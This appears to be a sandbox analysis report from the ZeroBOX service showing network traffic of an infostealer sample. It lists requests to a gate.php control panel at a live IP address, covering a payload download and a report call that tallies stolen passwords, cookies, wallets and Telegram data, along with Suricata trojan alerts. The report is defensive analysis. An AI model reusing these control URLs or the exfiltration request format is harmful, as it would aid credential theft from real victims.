NetWork | ZeroBOX

Favorites
Tools
Dr.Zero Chatbot
Notifications
Guide 2020-06-10
Version history 2020-06-10

latestReport
09.21 02:09
random.exe
09.21 02:09
sdhsfd.exe
09.21 02:09
66edb89bc4073_crypted....
09.21 02:09
66ed33772bbe7_vdfhsjf1...
09.21 02:09
game.exe
09.21 02:09
66ebb3bf78bd6_Send.exe...
09.21 02:09
66ed33717e4c1_vfdshfda...
09.21 02:09
random.exe
09.21 02:09
66ed336eac985_vdfhssfd...
09.21 02:09
66ed7ef071886_crypted....

Latest News
09.21 03:09
[PASCON 2024] 옥타코 이재형 ...
09.21 03:09
[PASCON 2024] S2W 김재기 ...
09.21 02:09
[PASCON 2024-영상] 탈레스 “...
09.21 02:09
Get Your Lisp On With ...
09.21 02:09
Zombie Construction Si...
09.21 01:09
[PASCON 2024-영상] 스패로우 ...
09.21 01:09
[PASCON 2024] 위즈코리아 “이...
09.21 11:09
Amateur Astronomer Ima...
09.21 10:09
Ukraine government say...
09.21 10:09
Sequoia update for mac...

NetWork | ZeroBOX

IP Address	Status	Action
134.209.203.126	Active	Moloch

Name	Response	Post-Analysis Lookup
No hosts contacted.

TCP Requests
- 192.168.56.102:49162 134.209.203.126:80
- 192.168.56.102:49164 134.209.203.126:80

UDP Requests

GET 200 http://134.209.203.126/hornycock/system/assets/bundle.bin

GET 200 http://134.209.203.126/hornycock/gate.php?type=settings

GET 200 http://134.209.203.126/hornycock/gate.php?type=ip

GET 200 http://134.209.203.126/hornycock/gate.php?type=report&tag=traffer1&uid=39B06D4D868D1303186797&passwords=0&cookies=2&autofill=0&cc=0&wallets=0&steam=0&battlenet=0&telegram=1&discord=0&jabber=0&vpn=0&ftp=1

GET 200 http://134.209.203.126/hornycock/gate.php?type=loader&tag=traffer1

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49162 -> 134.209.203.126:80	2018752	ET MALWARE Generic .bin download from Dotted Quad	A Network Trojan was detected
TCP 134.209.203.126:80 -> 192.168.56.102:49162	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 134.209.203.126:80 -> 192.168.56.102:49162	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.102:49164 -> 134.209.203.126:80	2022818	ET MALWARE Generic gate[.].php GET with minimal headers	A Network Trojan was detected
TCP 192.168.56.102:49164 -> 134.209.203.126:80	2022986	ET MALWARE Likely Zbot Generic Request to gate.php Dotted-Quad	A Network Trojan was detected
TCP 192.168.56.102:49164 -> 134.209.203.126:80	2030802	ET HUNTING Suspicious GET To gate.php with no Referer	Potentially Bad Traffic
TCP 192.168.56.102:49164 -> 134.209.203.126:80	2022818	ET MALWARE Generic gate[.].php GET with minimal headers	A Network Trojan was detected
TCP 192.168.56.102:49164 -> 134.209.203.126:80	2022986	ET MALWARE Likely Zbot Generic Request to gate.php Dotted-Quad	A Network Trojan was detected
TCP 192.168.56.102:49164 -> 134.209.203.126:80	2030802	ET HUNTING Suspicious GET To gate.php with no Referer	Potentially Bad Traffic
TCP 192.168.56.102:49164 -> 134.209.203.126:80	2022818	ET MALWARE Generic gate[.].php GET with minimal headers	A Network Trojan was detected
TCP 192.168.56.102:49164 -> 134.209.203.126:80	2022986	ET MALWARE Likely Zbot Generic Request to gate.php Dotted-Quad	A Network Trojan was detected
TCP 192.168.56.102:49164 -> 134.209.203.126:80	2030802	ET HUNTING Suspicious GET To gate.php with no Referer	Potentially Bad Traffic
TCP 134.209.203.126:80 -> 192.168.56.102:49164	2221010	SURICATA HTTP unable to match response to request	Generic Protocol Command Decode

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts